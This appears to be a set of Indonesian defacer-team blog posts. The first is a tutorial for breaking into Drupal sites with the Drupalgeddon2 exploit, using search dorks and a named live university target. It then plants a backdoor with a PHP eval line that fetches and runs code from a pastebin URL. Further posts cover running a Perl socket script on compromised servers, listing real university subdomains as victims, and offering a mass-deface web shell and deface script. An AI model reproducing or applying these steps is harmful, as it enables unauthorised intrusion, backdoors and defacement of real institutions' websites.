DRUPAL RCE UPLOAD SHELL

          Assalamualaikum warahmatullahi wabarakatuh.

Ketemu lagi dengan saya , kali ini saya membagikan tutorial deface menggunakan teknik DRUPAL RCE , tutorial deface ini menggunakan tools di terminal dengan bahasa Ruby . langsung saja tutorial nya ya :)

metode ini di gunakan untuk website yang memakai CMS Drupal

dork :

inurl:"*drupal_ajax"
intext:"powered by drupal"

kembangin lagi dengan otak kau yaa :'v

setelah menemukan site drupal tinggal eksekusi pakai tools nya saja,

buka terminal :

 $ apt-get install git

 $ gem install ruby

 $ git clone https://github.com/dreadlocked/Drupalgeddon2

buka file nya  

 $ cd Drupalgeddon2

cara pakai nya 

 $ ruby drupalgeddon2.rb <site>

contoh live target :

 $ ruby drupalgeddon2.rb http://school.unklab.ac.id/

jika berhasil nanti web nya ter connect ke terminal lo 

  cek dengan perintah

 $ uname -a

jika nanti muncul kernal web maka artinya berhasil

tinggal eksekusi deh . kalo mau tanam shell tinggal ketik gini

 $ echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/en5tp4kX"));?>' > tn.php

fungsi nya command di atas adalah membuat file tn.php dengan shell backdoor file get content

#tulisan yang saya merahin itu url pastebin LAX shell ( password shell = LAX ) bisa juga di ganti shell kalian sendiri

cara manggil shell nya

http://site.com/tn.php

  

nah berhasil kita tanam shell nya , tinggal eksekusi deh wkwkwk

JIKA UPLOAD SHELL GAGAL KITA LANGSUNG WRITE FILE AJA LEWAT TERMINAL

 $ echo ' ISI ' > namafile.php

keluar dari tools nya :

 $ exit

sekian tutorial dari saya semoga bermanfaat yaa, index jan lupa backup :')
Bisa kali nitiv nick gue dan team gue, TN72 dan GARUDA TERSAKTI 72,

Kami juga menyediakan Toolsnya berbasis web, cek disini .
Kurang lebihnya mohon maaf wassalamualaikum warahmatullahi wabarakatuh :)


thanks to  :

LAmongan Xploiter

HACKER PATAH HATI

Related Posts:

---

Belajar Socket Server

Assalamualaikum warahmatullahi wabarakatuh :)

yaaa ketemu lagi sama gue, kali ini gue mau berbagi sedikit ilmu tentang socket server :'V

Apa itu socket server? Cari gugel deh kalo gue jelasin gabakal kelar neeh tutornya :'v

Yaaa, langsung saja ..

Sudah pasti tau laah yaa sebelum socket harus ada akses shell yang tertanam di web target yaa :)
Dan juga Perl harus ON :'v

kalo udah seperti gambar diatas, langsung saja upload script socketnya :'v

kalo gapunya, bisa ambil disini :'v

trus ke command, ketik

$  perl npa.pl

[ npa.pl ] Adalah nama file yang aku upload

Metode ini akan membuka koneksi pada port yang sudah ditentukan ,,

Setelah itu, lalu jalankan command berikut untuk memastikan ,,

ketik lagi nih,

$ ps aux | grep ‘perl’

Aku menamai file perlnya dengan nama ‘ npa.pl ‘, maka akan menghasilkan seperti di gambar (perl [namafile].pl)

Setelah itu, coba kita buka [ IP:PORT ] pada browser kita untuk memastikan lagi berhasil atau tidaknya

Apakah koneksinya berhasil?
PORT yang saya buka adalah port 2000 .

Jika Sucsess maka akan muncul tampilannya seperti yang di atas :)

Sekarang, kita Reverse IP tersebut dan lihat ada berapa banyak domain dalam IP yang sama ,

Cuuus kebawah :'v

Reserve Ip

Coba salah satu website yang muncul disana dan tambahkan port 2000, karena di script
tersebut aku coba set port 2000,

Dan, yaaaap sukses gan :)

ini contoh webnyaa setelah di reserve ip :)

http://jpap.jurnal.unram.ac.id:2000/
http://cpanel.unram.ac.id:2000
http://dinamika.unram.ac.id:2000
http://efkip.unram.ac.id:2000
http://farmasi.unram.ac.id:2000
http://fh.unram.ac.id:2000
http://fp.unram.ac.id:2000
http://hmhi.unram.ac.id:2000
http://istnr2015.unram.ac.id:2000
http://jitpi.fpt.unram.ac.id:2000
http://jpap.jurnal.unram.ac.id:2000
http://jurnal.unram.ac.id:2000
http://jurnalfkip.unram.ac.id:2000
http://komunikasi.unram.ac.id:2000
http://map.unram.ac.id:2000
http://mipa.unram.ac.id:2000
http://semnaspertanian2016.unram.ac.id:2000
http://unramlawreview.unram.ac.id:2000
http://www.hmhi.unram.ac.id:2000
http://www.zoro.com:2000

Yaaa sekian tutor dari gue, nitiv nick dan team gue bisa kali :'v
TN72 dan GARUDA TERSAKTI 72

Dan terima kasih untuk semua TEAM DEFACER INDONESIA
Kurang lebihnya mohon maaf, wassalamualaikum warahmatullahi wabarahkatuh :)

Related Posts:

---

Mini shell Garuda Tersakti 72

Assalamualaikum warahmatullahi wabarakatuh,

ketemu lagi sama gue, kali ini gue mau share mini shell gue, ini gak murni hasil codingan gue, gue dibantu sama kawand yang ketemu di Internet :'v
yaaa dia, Pak Rizal dan Pak Nimo ..

Hehee, oiyaa mini shell ini memiliki fitur Mass Deface dan juga anti TYKUNG :)

yuu, langsung sedot dibawah yaa :'v

Disini beb :'v
Password default : garudatersakti72

Penampakan luarnya nih :'v

Dan ini penampakan dalamnya :'v

simple bukan? wkwk :v

Oiyaaa, sebelum kalian tebas indexnya, di backup dulu eaa kasian tau developernya :')
Heehe, boleh kali nitip nick gue dan team gue, TN72 dan GARUDA TERSAKTI 72.
okeokee, itu saja yang bisa gue sampaikan kurang lebihnya mohon maaf :'v

Wassalamualaikum warahmatullahi wabarakatuh :)

Related Posts:

---

SCRIPT DEFACE EDISI SOEMPAH PEMOEDA :)

Assalamualaikum warahmatullahi wabarakatuh :)

Yaa, ketemu lagi sama gue :'v
Kali ini gue cuma mau kasih script buat deface edisi 'SOEMPAH PEMOEDA'
yaaaap, langsung sedot ajaa dibawah neeh :'v

Di sini say :*


JANGAN LUPA CANTUMIN NIK GUE DAN TEAM YAA :)
TN72 dan GARUDA TERSAKTI 72 :)
wassalamualaikum warahmatullahi wabarakatuh :)

Related Posts:

---